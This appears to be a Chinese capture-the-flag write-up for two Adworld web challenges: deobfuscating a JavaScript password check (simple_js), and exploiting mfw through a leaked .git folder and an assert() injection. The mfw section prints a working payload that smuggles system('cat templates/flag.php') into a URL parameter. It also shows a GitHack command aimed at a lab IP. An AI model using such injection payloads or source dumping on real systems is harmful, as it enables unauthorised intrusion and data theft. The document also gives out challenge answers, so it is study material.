目录

一、simple_js

解题方法:

过程:

二、mfw

解题方法:

过程:

一、simple_js

解题方法:

1、理解php代码

过程:

输入框中输入密码后

Ctrl+U查看源码

<html>
<head><title>JS</title><script type="text/javascript">function dechiffre(pass_enc){var pass = "70,65,85,88,32,80,65,83,83,87,79,82,68,32,72,65,72,65";var tab  = pass_enc.split(',');var tab2 = pass.split(',');var i,j,k,l=0,m,n,o,p = "";i = 0;j = tab.length;k = j + (l) + (n=0);n = tab2.length;for(i = (o=0); i < (k = j = n); i++ ){o = tab[i-l];p += String.fromCharCode((o = tab2[i]));if(i == 5)break;}for(i = (o=0); i < (k = j = n); i++ ){o = tab[i-l];if(i > 5 && i < k-1)p += String.fromCharCode((o = tab2[i]));}p += String.fromCharCode(tab2[17]);pass = p;return pass;}String["fromCharCode"](dechiffre("\x35\x35\x2c\x35\x36\x2c\x35\x34\x2c\x37\x39\x2c\x31\x31\x35\x2c\x36\x39\x2c\x31\x31\x34\x2c\x31\x31\x36\x2c\x31\x30\x37\x2c\x34\x39\x2c\x35\x30"));h = window.prompt('Enter password');alert( dechiffre(h) );
</script>
</head>
</html>

1、function定义了一个函数
2、被切为2部分
3、o=tab[i-1]无效,会被后面o=tab2[i]的值覆盖
4、tab数组、输入参数都没有用到

5、tab2数组的值覆盖了tab的值,输入什么密码都没用

获取信息:

dechiffre():将 Unicode 编码转为一个字符

fromCharCode(): 可接受一个指定的 Unicode 值,然后返回一个字符串

10进制的字符:

70,65,85,88,32,80,65,83,83,87,79,82,68,32,72,65,72,65

16进制的字符:

\x35\x35\x2c\x35\x36\x2c\x35\x34\x2c\x37\x39\x2c\x31\x31\x35\x2c\x36\x39\x2c\x31\x31\x34\x2c\x31\x31\x36\x2c\x31\x30\x37\x2c\x34\x39\x2c\x35\x30

    var n=String.fromCharCode(55,56,54,79,115,69,114,116,107,49,50);document.write(n);var m=String.fromCharCode(70,65,85,88,32,80,65,83,83,87,79,82,68,32,72,65,72,65);document.write(m);

786OsErtk12

FAUX PASSWORD HAHA

或者:

php运行

<?php
$a='\x35\x35\x2c\x35\x36\x2c\x35\x34\x2c\x37\x39\x2c\x31\x31\x35\x2c\x36\x39\x2c\x31\x31\x34\x2c\x31\x31\x36\x2c\x31\x30\x37\x2c\x34\x39\x2c\x35\x30';
$b=str_replace('\x','',$a);
echo hex2bin($b);
?>

55,56,54,79,115,69,114,116,107,49,50

python运行

a=[55,56,54,79,115,69,114,116,107,49,50]
b=""
for i in a:c=chr(i)b=b+c
print(b)

786OsErtk12

FAUX PASSWORD HAHA

(人造密码哈哈)

题目提示(Flag格式为 Cyberpeace{xxxxxxxxx} )

所以flag为

Cyberpeace{786OsErtk12}

二、mfw

解题方法:

1、.git源码泄露

过程:

点进去发现只有这一个

尝试是否存在git泄露

存在git泄露

使用python2.7(我不想全局环境换来换去,直接在python2.7文件夹运行)

GitHack:GitHub - lijiejie/GitHack: A `.git` folder disclosure exploithttps://github.com/lijiejie/GitHack

语法:python GitHack.py http://www.openssl.org/.git/

我写的是GitHack.py的绝对路径

PS C:\Python27> python D:\BaiduNetdiskDownload\shenji\GitHack-master\GitHack.py http://61.147.171.105:62321/.git/

打开flag.php

也没发现flag

源码审计一波

自己看发现没有做任何的过滤,考虑试一试注入

payload:

?page=').system('cat templates/flag.php');//

')闭合前面的strpos函数,//注释掉后面的

注入进去以后就是

assert("strpos('templates/').system('cat templates/flag.php');//.php', '..') === false") or die("Detected hacking attempt!");

想到了flag.php

会不会是在代码里

Ctrl+U查看源码,或者使用bp抓包,不会错过许多细节

【攻防世界WEB】难度三星9分入门题(上):simple_js、mfw相关推荐

  1. 【攻防世界WEB】难度三星9分入门题(中):ics-05、easytornado

    目录 三.ics-05 解题方法: 过程: 四.easytornado 解题方法: 过程: 三.ics-05 解题方法: 1.php代码理解.php伪协议 过程: 进去先扫了一遍 index.html ...

  2. 攻防世界 web高手进阶区 9分题 favorite_number

    前言 继续ctf的旅程 开始攻防世界web高手进阶区的9分题 本文是favorite_number的writeup 解题过程 进入界面 简单的代码审计 首先是个判断,既要数组强等于,又要首元素不等 然 ...

  3. 攻防世界 web高手进阶区 10分题 weiphp

    前言 继续ctf的旅程 开始攻防世界web高手进阶区的10分题 本文是weiphp的writeup 解题过程 进入界面 点击 进入一个登陆界面 没有注册 那肯定得找源码了 惯例源码+御剑 发现git泄 ...

  4. 攻防世界 web高手进阶区 8分题 Web_python_block_chain

    前言 继续ctf的旅程 开始攻防世界web高手进阶区的8分题 本文是Web_python_block_chain的writeup 解题过程 这是个区块链题 这..裂开了啊 没搞过区块链 从零开始学习 ...

  5. 攻防世界 web高手进阶区 9分题 bilibili

    前言 继续ctf的旅程 开始攻防世界web高手进阶区的9分题 本文是bilibili的writeup 解题过程 进来界面 这尼玛出题人是黑还是粉啊 笑死 看题目意思是买lv6 惯例源码+御剑 没发现什 ...

  6. 攻防世界 web高手进阶区 7分题Confusion1

    前言 继续ctf的旅程 开始攻防世界web高手进阶区的7分题 本文是Confusion1的writeup 解题过程 进来的界面如下 (后来知道是php vs python的意思,也就是给提示跟pyth ...

  7. XCTF攻防世界Web新手入门题大全

    XCTF攻防世界Web之WriteUp无图版 (Tips:有图版本,请移步我的资源,自行下载doc文档) 0x00 准备 [内容] 在xctf官网注册账号,即可食用. [目录] 目录 0x01 vie ...

  8. 攻防世界web进阶区Web_python_block_chain详解

    攻防世界web进阶区Web_python_block_chain详解 题目 详解 51% 双花攻击 题目 详解 我们整理一下 Announcement: The server has been res ...

  9. 攻防世界WEB进阶之ics-05

    攻防世界WEB进阶之ics-05 1.描述 2.实操 3.答案 1.描述 难度系数: 3星 题目来源: XCTF 4th-CyberEarth 题目描述:其他破坏者会利用工控云管理系统设备维护中心的后 ...

  10. 攻防世界-WEB进阶-ics-06(Burpsuite爆破使用)

    前言 题目来源:攻防世界-WEB进阶----ics-06 使用工具:Burpsuite 题目 云平台报表中心收集了设备管理基础服务的数据,但是数据被删除了,只有一处留下入侵者的痕迹 分析 这里只有报表 ...

最新文章

  1. 常用 CSS 选择器
  2. .NET应用架构设计—面向查询服务的参数化查询设计(分解业务点,单独配置各自的数据查询契约)...
  3. SPOJ 130 - Rent your airplane and make money(dp+优化)
  4. 自然语言处理一大步,应用Word2Vec模型学习单词向量表征
  5. 主线程 唤醒_python线程之九:生产者消费者3种方式,2个线程1个协程
  6. 2017双11技术揭秘—阿里数据库计算存储分离与离在线混布
  7. maccmsv10 苹果cms10 站群扩展 自用版
  8. mysql二分法查找亿行_算法——二分法查找(binarySearch)
  9. 火车进出栈问题(高精度+压位+质因数分解消除除法)
  10. 酒店客房管理系统任务汇报1
  11. 项目管理工具maven
  12. 腾讯同事要跳槽,问我背包问题具体咋回事,我直接甩给他这篇!
  13. 幼儿抽象逻辑思维举例_四个锻炼幼儿推理能力的小游戏,让孩子的逻辑思维更上一层楼...
  14. SWEBOK软件工程知识体系 - 7.软件工程管理
  15. 288芯光缆交接箱光交箱图文详解
  16. 2013.11.18周例会小结
  17. 淘宝商品上传API接口
  18. 360极速浏览器调用selenium
  19. 软件开发模型之迭代模型
  20. ElasticSearch整合SpringBoot的API操作

热门文章

  1. (六)1609.4协议详解
  2. 《蔡康永的说话之道》读书笔记
  3. 存储器——Cache
  4. 网站被劫持的方式,和检测方法、网站被劫持、检测方法有哪些
  5. 计算机音乐苹果手机,iPhone手机音乐如何导出电脑?
  6. 政府采购87号令实施满月,地信企业须警惕九个坑
  7. 什么是OBD及组成和作用、工作原理
  8. 显示Java国家列表
  9. Visual Studio远程调试程序
  10. Widows Server 2012上无法安装.net framework 3.5